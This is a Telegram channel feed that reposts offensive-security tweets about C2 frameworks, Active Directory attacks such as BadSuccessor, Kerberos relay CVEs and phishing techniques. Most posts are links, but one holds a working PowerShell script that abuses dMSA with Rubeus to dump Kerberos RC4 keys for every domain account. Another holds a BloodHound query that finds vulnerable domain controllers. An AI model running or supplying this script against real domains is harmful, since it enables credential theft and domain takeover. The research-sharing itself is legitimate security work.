Offensive Xwitter
19.4K subscribers
909 photos
49 videos
21 files
2.09K links
~$ socat TWITTER-LISTEN:443,fork,reuseaddr TELEGRAM:1.3.3.7:31337

Disclaimer: https://t.iss.one/OffensiveTwitter/546
Download Telegram
😈 [ Bad Sector Labs @badsectorlabs ]

Cobalt Strike for free!? Adaptix C2 (@hacker_ralf) is the best open source C2 I've used since Havoc (@C5pider). SOCKS5, remote and local port forwards, and BOF support! Now it's easy to install the server + client, especially on 🏟️Ludus with our new role:

πŸ”— https://github.com/badsectorlabs/ludus_adaptix_c2

πŸ₯ [ tweet ]
πŸ”₯21πŸ€”1😒1
😈 [ mpgn @mpgn_x64 ]

Thanks to the awesome work of @LadhaAleem , the CTF Windows Active Directory lab for @_barbhack_ from 2024 is now public! πŸ”₯

You can build the lab and pwn the AD β€” 13 flags to capture! No public write-up exists yet β€” waiting for someone to submit one!

πŸ”— https://github.com/Pennyw0rth/NetExec-Lab/tree/main/BARBHACK-2024

πŸ₯ [ tweet ]
πŸ”₯12
😈 [ Matt Ehrnschwender @M_alphaaa ]

I am very excited to be releasing Tetanus, a Mythic C2 agent written in Rust! This is a project @0xdab0 have been working on to experiment with the Rust programming language by developing a Mythic C2 agent.

πŸ”— https://github.com/MythicAgents/tetanus

πŸ₯ [ tweet ]

эх Π²ΠΎΡ‚ Π±ΠΈ всС Π² ΠΌΠΈΡ€Π΅ ΠΏΠ΅Ρ€Π΅ΠΏΠΈΡΠ°Ρ‚ΡŒ Π½Π° раст πŸ¦€ πŸ‘πŸ» πŸ¦€ πŸ‘πŸ»
😁13🍌3πŸ‘2
😈 [ Steve S. @0xTriboulet ]

rssh-rs is a reflective DLL that performs some hacky integration with your favorite C2 Framework to provide SSH session access from a Beacon session.

πŸ”— https://github.com/0xTriboulet/rssh-rs

πŸ₯ [ tweet ]
πŸ‘1
😈 [ Yehuda Smirnov @yudasm_ ]

What if you skipped VirtualAlloc, skipped WriteProcessMemory and still got code execution?
We explored process injection using nothing but thread context.
Full write-up + PoCs:

πŸ”— https://blog.fndsec.net/2025/05/16/the-context-only-attack-surface/

πŸ₯ [ tweet ]
πŸ”₯9πŸ₯±2πŸ‘1
😈 [ Yuval Gordon @YuG0rd ]

πŸš€ We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability
It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it πŸ€·β€β™‚οΈ
Read Here -

πŸ”— https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory

πŸ₯ [ tweet ]
πŸ”₯9
Offensive Xwitter
😈 [ Yuval Gordon @YuG0rd ] πŸš€ We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it…
😈 [ Bad Sector Labs @badsectorlabs ]

MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectsid ENDS WITH '-516' WITH COLLECT(c1.name) AS dcs MATCH (c2:Computer) WHERE c2.enabled = true AND (c2.operatingsystem contains '2025') AND (c2.name IN dcs) RETURN c2.name

If this query hits, you're in.

πŸ₯ [ tweet ][ quote ]
πŸ‘5
😈 [ mpgn @mpgn_x64 ]

Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions πŸ”₯

πŸ”— https://github.com/Pennyw0rth/NetExec/pull/702

πŸ₯ [ tweet ][ quote ]
πŸ”₯11πŸ₯±3πŸ‘1
😈 [ David Kennedy @Cyb3rC3lt ]

Python version of BadSuccessor by Cybrly.

πŸ”— https://github.com/cybrly/badsuccessor

πŸ₯ [ tweet ]
πŸ”₯6πŸ‘3πŸ₯±2
This media is not supported in your browser
VIEW IN TELEGRAM
😈 [ Yuval Gordon @YuG0rd ]

Many missed this on #BadSuccessor: it’s also a credential dumper.
I wrote a simple PowerShell script that uses Rubeus to dump Kerberos keys and NTLM hashes for every principal-krbtgt, users, machines. no DCSync required, no code execution on DC.

πŸ₯ [ tweet ]

ΠΊΠ°ΠΊΠΎΠΉ ΠΆΠ΅ Ρ€Π°Π·ΡŠΠ΅Π± πŸ˜‚πŸ€£

upd. Π°Π²Ρ‚ΠΎΡ€ Π΄Π΅Π»Π°Π΅Ρ‚ Ρ‡Ρ‚ΠΎ-Ρ‚ΠΎ Ρ‚ΠΈΠΏΠ° Ρ‚Π°ΠΊΠΎΠ³ΠΎ, Ссли Ρ‡Ρ‚ΠΎ, со своСй вСрсиСй рубСуса:

$domain = Get-ADDomain
$dmsa = "CN=mydmsa,CN=Managed Service Accounts,$($domain.DistinguishedName)"
$allDNs = @(Get-ADUser -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName) `
+ @(Get-ADComputer -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName)
$allDNs | % {
Set-ADObject -Identity $dmsa -Replace @{ "msDS-ManagedAccountPrecededByLink" = $_.DN }
$res = Invoke-Rubeus asktgs /targetuser:mydmsa$ /service:"krbtgt/$($domain.DNSRoot)" /opsec /dmsa /nowrap /ticket:$kirbi
$rc4 = [regex]::Match($res, 'Previous Keys for .*\$: \(rc4_hmac\) ([A-F0-9]{32})').Groups[1].Value
"$($_.sAMAccountName):$rc4"
}
😁13πŸ”₯9πŸ₯±2
😈 [ Matt Ehrnschwender @M_alphaaa ]

I'm finally releasing a project that I've been working on for a little while now. Here's Boflink, a linker for Beacon Object Files.

πŸ”— https://github.com/MEhrn00/boflink

Supporting blog post about it.

πŸ”— https://blog.cybershenanigans.space/posts/boflink-a-linker-for-beacon-object-files/

πŸ₯ [ tweet ]
🍌7😁1
Forwarded from PT SWARM
This media is not supported in your browser
VIEW IN TELEGRAM
⚠️ We've reproduced CVE-2025-49113 in Roundcube.

This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization.

If you're running Roundcube β€” update immediately!
πŸ”₯25πŸ₯±1🍌1
😈 [ Aditya Telange @adityatelange ]

evil-winrm-py v1 released🌟

πŸ”— https://github.com/adityatelange/evil-winrm-py/releases/tag/v1.0.0

πŸ₯ [ tweet ]
πŸ‘6πŸ”₯6
😈 [ Fabian @testert01 ]

Unconstrained Delegation on a gMSA and Webclient / NTLMv1 active on servers that can retrieve the credentials of a gMSA with unconstrained delegation can lead to a complete domain compromise from domain users.

@micahvandeusen, @_dirkjan, nice tools :)

πŸ”— https://nothingspecialforu.github.io/UCgMSAExploitation/

πŸ₯ [ tweet ]
πŸ‘6
😈 [ mr.d0x @mrd0x ]

Finally had some time to publish these blogs. Enjoy!

Spying On Screen Activity Using Chromium Browsers

πŸ”— https://mrd0x.com/spying-with-chromium-browsers-screensharing/

Camera and Microphone Spying Using Chromium Browsers

πŸ”— https://mrd0x.com/spying-with-chromium-browsers-camera/

πŸ₯ [ tweet ]
πŸ‘7πŸ₯±4
This media is not supported in your browser
VIEW IN TELEGRAM
😈 [ James Woolley @Xtrato ]

I left a server online with VNC wide open to see how it would be interacted with. This is one of the more interesting interactions πŸ‘†

πŸ₯ [ tweet ]
πŸ₯±20🍌7πŸ‘5😁3🀯1
😈 [ RedTeam Pentesting @RedTeamPT ]

🚨 Our new blog post about Windows CVE-2025-33073 which we discovered is live.

πŸͺž The Reflective Kerberos Relay Attack - Remote privilege escalation from low-priv user to SYSTEM with RCE by applying a long forgotten NTLM relay technique to Kerberos:

πŸ”— https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/

πŸ‘€ We have also released a paper which really goes into the nitty-gritty for those who are interested:

πŸ”— https://www.redteam-pentesting.de/publications/2025-06-11-Reflective-Kerberos-Relay-Attack_RedTeam-Pentesting.pdf

πŸ₯ [ tweet ]
πŸ”₯11
😈 [ Synacktiv @Synacktiv ]

Microsoft just released the patch for CVE-2025-33073, a critical vulnerability allowing a standard user to remotely compromise any machine with SMB signing not enforced! Checkout the details in the blogpost by @yaumn_ and @wil_fri3d.

πŸ”— https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

πŸ₯ [ tweet ]
πŸ₯±8πŸ‘4
😈 [ Praetorian @praetorianlabs ]

🚨 New attack disclosed: GitHub Device Code Phishing

John, Matt, and Mason reveal how they've been using this technique to compromise F500 orgs with high success rates.

πŸ“– Blog covers methodology, red team case studies & detection strategies

πŸ”— https://www.praetorian.com/blog/introducing-github-device-code-phishing/

πŸ₯ [ tweet ]
πŸ”₯7